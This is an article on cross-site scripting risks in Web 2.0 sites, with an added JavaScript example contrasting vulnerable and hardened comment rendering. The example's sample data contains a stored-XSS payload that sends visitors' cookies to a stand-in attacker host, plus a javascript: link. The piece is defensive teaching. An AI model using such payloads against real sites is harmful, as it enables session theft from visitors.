SECURITY FOR THE MIDMARKET
Stopping malware viruses from attacking Web 2.0 technology


Brien M. Posey, Contributor
12.02.2008


Although Web 2.0 technology allows us to do things on the Internet that were never before possible, a certain amount of risk comes into play any time a site offers a high degree of interactivity. In fact, there have been several documented cases of otherwise legitimate Web 2.0 sites being used as a mechanism for spreading malware.

The reason Web 2.0 presents such a security risk has to do with a site's level of interactivity. Websites such as YouTube and MySpace allow users to upload files and post other types of content, and that user-supplied content has been used to carry out cross-site scripting (XSS) attacks against the site's other visitors.

This type of attack involves either uploading malicious files to a Web 2.0 site or embedding JavaScript in text input fields (a profile, a comment, a caption) that the site later displays to everyone. When other visitors reach a page containing the injected script, it runs in their browsers with the same access to the site as the site's own code, which is enough to steal session cookies, act on the victim's behalf or redirect the victim to a site that serves malicious downloads. Visitors who download and run malicious files from the site infect their machines directly.

Certainly, this is a major security threat, but let's move beyond the obvious. For starters, most security software treats well-known Web 2.0 sites as completely safe: URL filters and reputation services classify the domain, not the individual pages and uploads that other users keep adding to it. Of course the site itself is safe, but the content posted on the site by other users may not be. This means users may be exposed to malicious content on sites that have been classified as safe.

Another problem with the malicious use of otherwise benign websites is the legal ramifications. I don't think the legal issues have completely shaken out yet, but there has been a lot of speculation lately that a website owner could be held liable for the malicious use of his site, even if there is nothing malicious about the site itself. The idea is that a site owner could be found negligent in his security practices for having allowed the exploit to happen.

Of course the legal issues work both ways. There are plenty of security companies that blacklist and whitelist websites based on whether or not those sites are considered safe. Such a company would face a tremendous backlash if it ever blacklisted a site such as MySpace or classified it as unsafe, but it might face legal action from users if such a site did happen to serve malicious content.

Ultimately, the only way to really address cross-site scripting attacks is for Web developers to bring security to the forefront of every design decision. Essentially, Web applications need to be coded so that all user input is treated as "evil" until proven otherwise. This means Web developers must assume that all input is malicious, validate it against what the field is actually supposed to contain, and, just as important, encode it for the context in which it is written back into a page (HTML body, attribute, URL, script) so that whatever does get stored can never be interpreted by the browser as markup or code.
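As an added example (not code from the article), here is a comment-rendering routine for a site that displays user-posted profiles, first written the vulnerable way and then hardened along the lines just described. The post data, the function names and the attacker address are constructed for illustration.

```javascript
// Added example, not from the original article: rendering a user-posted
// comment on a Web 2.0 style page, first the vulnerable way, then hardened.
// Function names, field names and sample data are hypothetical.

// Constructed sample of what two users might post in their profile fields.
// "mallory" is the attacker; attacker.invalid is a placeholder host.
const SAMPLE_POSTS = [
  { author: "alice", text: "Great video!", homepage: "https://example.org/alice" },
  {
    author: "mallory",
    text: '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>',
    homepage: "javascript:alert(document.cookie)",
  },
];

// VULNERABLE: user-controlled strings are concatenated straight into HTML.
// Whatever mallory typed becomes part of the page every other visitor loads,
// and the browser runs it with the site's own origin (stored XSS).
function renderCommentUnsafe(post) {
  return `<li><a href="${post.homepage}">${post.author}</a>: ${post.text}</li>`;
}

// Hardened, step 1: encode for the HTML text/attribute context. Every
// character that can start or end markup is replaced by its entity, so the
// browser displays the text instead of interpreting it.
function escapeHtml(s) {
  const table = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (ch) => table[ch]);
}

// Hardened, step 2: the href context needs more than encoding. An
// entity-encoded "javascript:" URL is decoded by the browser and still runs
// when clicked, so parse the URL and allow only http(s); anything else is
// replaced by a harmless placeholder link.
function safeHref(candidate) {
  let url;
  try {
    url = new URL(String(candidate));
  } catch (e) {
    return "#"; // not a parseable absolute URL: reject it
  }
  return url.protocol === "http:" || url.protocol === "https:" ? url.href : "#";
}

// Validate the URL for its context, then encode every field for HTML.
function renderCommentSafe(post) {
  return `<li><a href="${escapeHtml(safeHref(post.homepage))}">${escapeHtml(post.author)}</a>: ${escapeHtml(post.text)}</li>`;
}

// Crude check used only to show the difference between the two renderers:
// does the produced HTML still contain a live script tag or javascript: link?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /href="javascript:/i.test(html);
}

// Stand-alone demonstration.
for (const post of SAMPLE_POSTS) {
  console.log("unsafe :", renderCommentUnsafe(post), containsActiveContent(renderCommentUnsafe(post)));
  console.log("safe   :", renderCommentSafe(post), containsActiveContent(renderCommentSafe(post)));
}
```

Encoding alone would not have saved the link: once the browser decodes the attribute, an entity-encoded `javascript:` URL is a `javascript:` URL again, which is why the href goes through a scheme allowlist before being encoded. The same two-step reasoning, validate for the destination context and then encode for it, applies to every other place the site writes user data into a page.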

The problem with this is that not all Web developers can be trusted to protect users against malicious use of an otherwise legitimate site. Because you can never really tell for sure whether a site is being exploited by those with malicious intent, Microsoft is also taking steps to do something about cross-site scripting vulnerabilities. Internet Explorer 8 is slated to be the first version of the browser with a built-in cross-site scripting filter.

Although Internet Explorer 8 has been in beta testing for quite some time now, it remains to be seen how well Microsoft's new cross-site scripting filter will work when the browser is finally released. Microsoft is walking a fine line in that it must design the filter to provide adequate protection without breaking Web 2.0 applications or pestering users with constant nag screens. It is also worth knowing what such a filter can and cannot do: it works by spotting script in the outgoing request that comes straight back in the response, so it addresses reflected attacks and offers no protection against the stored kind described above, where the script was posted earlier by another user and is served to everyone as ordinary page content.

Anytime a new technology emerges, there are certain unforeseen problems that initially come along with it, and the same goes for Web 2.0. I think that as browser security and Web application coding practices improve, though, cross-site scripting attacks will become less of a problem.

Brien M. Posey, MCSE, is a Microsoft Most Valuable Professional for his work with Windows 2000 Server and IIS. He has served as CIO for a nationwide chain of hospitals and was once in charge of IT security for Fort Knox. Write to him at editor@searchcio-midmarket.com.


All Rights Reserved, Copyright 2007 - 2009, TechTarget | Read our Privacy Policy